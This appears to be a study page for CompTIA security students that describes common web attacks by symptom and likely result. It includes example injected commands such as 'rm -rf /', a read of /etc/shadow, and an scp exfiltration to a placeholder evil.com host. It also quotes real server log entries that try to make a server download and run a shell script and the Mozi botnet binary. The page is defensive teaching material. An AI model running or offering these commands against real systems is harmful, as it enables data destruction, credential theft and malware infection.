Entryway to a Buddhist temple.

Recognizing Attacks

Name, Symptom, and Result

CompTIA wants you to recognize common attack categories. You need to know simplified descriptions of their symptoms. And, know what they could lead to.

Cross-site Scripting / XSS

Symptom:
A page at "a popular social media site" contains:
<script ...></script>

Possible result:
It tricks your browser into sending an authentication cookie to a hostile server instead of the appropriate one.

SQL Injection

Symptom:
Log of transactions includes: ' or 1=1; --
or: "Strange punctuation marks"

Possible result:
Literally anything that could be done on a database server. Deleting database tables, deleting records, changing records, adding records, and so on.

Command Injection

Symptom:
The web server log contains requests that include command syntax.
Windows:
format c: /y
type \path\to\sensitive\file
Linux:
rm -rf /
cat /etc/shadow
scp /path/to-sensitive/file hacker@evil.com:
In both operating systems, spaces may be replaced with %20.

Possible result:
Literally anything. The above likely examples show deleting entire file system and exfiltrating sensitive file contents.

Real world example, way too complicated to appear on the exam. Here is something from the logs for this site. The hostile client was 185.239.242.171, which resolves to scl-00172.mails--servers.org (as per nslookup or dig), and is in an IP address belonging to Serverion BV in the Netherlands (as per whois).

The log entry was:
185.239.242.171 - - [17/Feb/2021:20:14:13 +0000] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`cd /tmp; wget 37.46.150.102/lolol.sh; chmod 777 lolol.sh; sh lolol.sh` HTTP/1.1" 400 150 "-" - -

The client at 185.239.242.171 is trying to trick my server into downloading and running a program stored on a server at 37.46.150.102, which resolves to situku.e-conteri.com and is in a different address block belonging to Serverion BV.

Or there's this far too common attempt to install the Mozi software on an IoT device running a poorly configured web server. It asks to change to /tmp, remove everything there, and then download and run a program named Mozi.a with a parameter jaws, doing all the dirty work. Spaces are represented by "+":
94.43.10.33 - - [04/Jan/2021:22:56:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://94.43.10.33:53251/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 169 "-" - -

Running a command like the following on a web server is eye-opening:
grep wget /var/www/logs/httpd-access.log

Session Hijacking / Insecure Direct Object References

Symptom:
User Fred notices that when logged in to his bank the URL includes user=fred, so he changes it to his friend user=mary and reloads the page, and sees her data.

Possible result:
Now he's in a session as Mary, so he can do anything that she could do with her account.

Directory Traversal

Symptom:
Server log includes ../../ in requested URLs.

Possible result:
If the server allows itself to be tricked into climbing out of the web area, attacker can read and possibly execute files outside the web area.

Cross-Site Request Forgery / XSRF / CSRF

Symptom:
Malicious content within a popular page contains a malformed <img src="..."> object.

Possible result:
A third party is disadvantaged, to the advantage of the person who dropped that comment into an unfiltered comment area.

Fixes for All of These

The common problem is that user input is not properly sanitized or validated for size, syntax, or meaning.

Adding or fixing input data validation means modifying software, so always apply patches.

WAFs or Web Application Firewalls know about these, so use one to protect the web front ends to public-facing services.

To the Cybersecurity Page